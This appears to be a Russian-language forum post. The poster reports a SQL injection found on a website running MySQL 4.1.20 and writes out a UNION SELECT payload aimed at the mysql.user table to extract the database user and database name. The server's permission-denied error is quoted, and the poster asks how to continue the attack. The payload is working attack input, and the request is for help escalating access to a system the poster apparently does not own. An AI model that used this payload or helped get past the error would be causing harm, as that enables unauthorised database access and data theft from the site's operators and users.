Всем доброго(ой) вечера\ночи!
Уважаемые!
Подсабите хорошим словом =)
Наткунлся на SQL-инъекцию (MYSQL - 4.1.20-standard).
Код HTML:
{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8,9+from+mysql.user+where+id=1/*
пишет...
SELECT command denied to user '........'@'localhost' for table 'user' SQL query : select cityID, fd_type, fd_title, fd_number, art_title, date, art_url, html, pdf from mytable_press WHERE id = -1 union select 1,2,user(),null,database(),null,7,8,9 from mysql.user where id=1/* ORDER BY date DESC;
SELECT command denied to user '........'@'localhost' - Конец истории? или есть продолжение.
Подскажите пожалуйста.
С уважением.